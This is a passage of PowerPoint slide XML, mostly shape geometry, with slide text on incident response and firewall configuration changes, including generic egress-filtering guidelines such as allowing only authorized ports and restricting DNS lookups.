                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3883" y="248554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="296672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1483360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3883" y="1531477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15126" y="1577124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33117" y="1619690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57245" y="1658563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86899" y="1693132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121468" y="1722786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160341" y="1746914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202907" y="1764905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248554" y="1776148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296671" y="1780032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3528567" y="1780032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3576685" y="1776148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3622332" y="1764905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3664898" y="1746914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3703771" y="1722786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3738340" y="1693132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3767994" y="1658563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3792122" y="1619690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3810113" y="1577124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3821356" y="1531477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3825240" y="1483360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3825240" y="296672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3821356" y="248554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3810113" y="202907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3792122" y="160341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3767994" y="121468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3738340" y="86899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3703771" y="57245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3664898" y="33117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3622332" y="15126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3576685" y="3883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3528567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400038" y="4682490"/>
              <a:ext cx="3825240" cy="1780539"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3825240" h="1780539">
                  <a:moveTo>
                    <a:pt x="0" y="296672"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3883" y="248554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15126" y="202907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33117" y="160341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57245" y="121468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86899" y="86899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121468" y="57245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160341" y="33117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202907" y="15126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248554" y="3883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296671" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3528567" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3576685" y="3883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3622332" y="15126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3664898" y="33117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3703771" y="57245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3738340" y="86899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3767994" y="121468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3792122" y="160341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3810113" y="202907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3821356" y="248554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3825240" y="296672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3825240" y="1483360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3821356" y="1531477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3810113" y="1577124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3792122" y="1619690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3767994" y="1658563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3738340" y="1693132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3703771" y="1722786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3664898" y="1746914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3622332" y="1764905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3576685" y="1776148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3528567" y="1780032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296671" y="1780032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248554" y="1776148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202907" y="1764905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160341" y="1746914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121468" y="1722786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86899" y="1693132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57245" y="1658563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33117" y="1619690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15126" y="1577124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3883" y="1531477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1483360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="296672"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="04668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6642607" y="5376164"/>
            <a:ext cx="333756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20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Re-audit</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="220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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="1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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>controls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150864" y="4393691"/>
            <a:ext cx="680085" cy="702945"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="680084" h="702945">
                <a:moveTo>
                  <a:pt x="339851" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="293733" y="3205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249502" y="12544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207561" y="27598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168317" y="47949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132173" y="73179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99536" y="102869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70809" y="136603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46397" y="173961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26705" y="214526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12139" y="257880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3102" y="303604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="351282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3102" y="398959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12139" y="444683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26705" y="488037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46397" y="528602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70809" y="565960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99536" y="599694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132173" y="629384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168317" y="654614"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207561" y="674965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249502" y="690019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293733" y="699358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339851" y="702563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385970" y="699358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="430201" y="690019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="472142" y="674965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="511386" y="654614"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="547530" y="629384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="580167" y="599694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="608894" y="565960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="633306" y="528602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="652998" y="488037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="667564" y="444683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="676601" y="398959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="679704" y="351282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="676601" y="303604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="667564" y="257880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="652998" y="214526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="633306" y="173961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="608894" y="136603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="580167" y="102869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="547530" y="73179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="511386" y="47949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="472142" y="27598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="430201" y="12544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385970" y="3205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339851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6399657" y="4550410"/>
            <a:ext cx="1847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0" b="1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613653" y="5509005"/>
            <a:ext cx="786130" cy="127000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="786129" h="127000">
                <a:moveTo>
                  <a:pt x="658749" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="658749" y="127000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760349" y="76200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="671449" y="76200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="671449" y="50800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760349" y="50800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="658749" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="786129" h="127000">
                <a:moveTo>
                  <a:pt x="658749" y="50800"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="50800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="76200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="658749" y="76200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="658749" y="50800"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="786129" h="127000">
                <a:moveTo>
                  <a:pt x="760349" y="50800"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="671449" y="50800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="671449" y="76200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760349" y="76200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="785749" y="63500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760349" y="5080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44159" y="306451"/>
            <a:ext cx="55676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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Firewall</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Changes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8723" y="760476"/>
            <a:ext cx="7775448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614671" y="3115055"/>
            <a:ext cx="8044180" cy="901065"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8044180" h="901064">
                <a:moveTo>
                  <a:pt x="0" y="150114"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7650" y="102656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28955" y="61447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61447" y="28956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102656" y="7650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150113" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7893558" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7941015" y="7650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7982224" y="28955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8014716" y="61447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8036021" y="102656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8043672" y="150114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8043672" y="750570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8036021" y="798027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8014716" y="839236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7982224" y="871728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7941015" y="893033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7893558" y="900684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150113" y="900684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102656" y="893033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61447" y="871728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28955" y="839236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7650" y="798027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="750570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="150114"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699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64635" y="3115055"/>
            <a:ext cx="900684" cy="90068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4614671" y="4180332"/>
            <a:ext cx="8044180" cy="901065"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8044180" h="901064">
                <a:moveTo>
                  <a:pt x="0" y="150113"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7650" y="102656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28955" y="61447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61447" y="28955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102656" y="7650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150113" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7893558" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7941015" y="7650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7982224" y="28955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8014716" y="61447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8036021" y="102656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8043672" y="150113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8043672" y="750569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8036021" y="798027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8014716" y="839236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7982224" y="871727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7941015" y="893033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7893558" y="900683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150113" y="900683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102656" y="893033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61447" y="871727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28955" y="839236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7650" y="798027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="750569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="150113"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12700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614671" y="5231891"/>
            <a:ext cx="8044180" cy="901065"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8044180" h="901064">
                <a:moveTo>
                  <a:pt x="0" y="150113"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7650" y="102656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28955" y="61447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61447" y="28955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102656" y="7650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150113" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7893558" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7941015" y="7650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7982224" y="28955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8014716" y="61447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8036021" y="102656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8043672" y="150113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8043672" y="750570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8036021" y="798027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8014716" y="839236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7982224" y="871728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7941015" y="893033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7893558" y="900684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150113" y="900684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102656" y="893033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61447" y="871728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28955" y="839236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7650" y="798027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="750570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="150113"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699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614671" y="6316979"/>
            <a:ext cx="8044180" cy="901065"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8044180" h="901065">
                <a:moveTo>
                  <a:pt x="0" y="150114"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7650" y="102656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28955" y="61447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61447" y="28956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102656" y="7650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150113" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7893558" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7941015" y="7650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7982224" y="28956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8014716" y="61447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8036021" y="102656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8043672" y="150114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8043672" y="750570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8036021" y="798027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8014716" y="839236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7982224" y="871728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7941015" y="893033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7893558" y="900684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150113" y="900684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102656" y="893033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61447" y="871728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28955" y="839236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7650" y="798027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="750570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="150114"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12700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614671" y="7403592"/>
            <a:ext cx="8044180" cy="899160"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8044180" h="899159">
                <a:moveTo>
                  <a:pt x="0" y="149859"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7636" y="102477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28903" y="61337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61337" y="28903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102477" y="7636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149860" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7893811" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7941194" y="7636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7982334" y="28903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8014768" y="61337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8036035" y="102477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8043672" y="149859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8043672" y="749299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8036035" y="796667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8014768" y="837805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7982334" y="870245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7941194" y="891520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7893811" y="899159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149860" y="899159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102477" y="891520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61337" y="870245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28903" y="837805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7636" y="796667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="749299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="149859"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699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757933" y="1882292"/>
            <a:ext cx="13143230" cy="61360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57450" marR="5080" indent="-2444750">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Analysis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attack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must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done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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>determine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exploited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vector.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done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applying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strict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egress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filtering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rules.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Some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guidelines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configure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egress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filtering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are:</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="5356225" marR="4207510">
              <a:lnSpc>
                <a:spcPts val="8390"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1120"/>
              </a:spcBef>
            </a:pP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Allow</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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only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authorized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ports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Restrict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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>DNS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lookups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850">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="1138555">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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Block</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>access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bad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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>IP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addresses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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>known</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="4359910" marR="3212465" indent="-1905">
              <a:lnSpc>
                <a:spcPct val="323700"/>
              </a:lnSpc>
            </a:pP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Block </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>access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to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unauthorized </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-75">
                <a:solidFill>
